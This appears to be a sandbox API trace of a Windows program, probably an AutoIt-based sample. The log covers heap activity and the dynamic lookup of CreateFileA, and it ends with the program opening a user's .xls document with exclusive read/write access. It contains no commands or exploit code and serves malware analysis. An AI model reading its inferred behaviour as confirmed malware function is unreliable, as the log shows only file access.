PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.613] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0172.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0172.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0172.613] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0172.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0172.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0172.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0172.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0172.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0172.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0172.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0172.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0172.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0172.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0172.614] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0172.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0172.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0172.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0172.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0172.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0172.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0172.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0172.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0172.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0172.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0172.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0172.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.617] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0172.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0172.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.620] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0172.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bda20 [0172.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bda20, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0172.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.621] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0172.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0172.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bda20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0172.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.622] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0172.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0172.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa5f008 [0172.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0172.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x51) returned 0x8c4a48 [0172.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls", cchWideChar=81, lpMultiByteStr=0x8c4a48, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls", lpUsedDefaultChar=0x0) returned 81 [0172.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0172.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.624] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\oxndwhixtyjqte06unb5.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0172.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0172.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 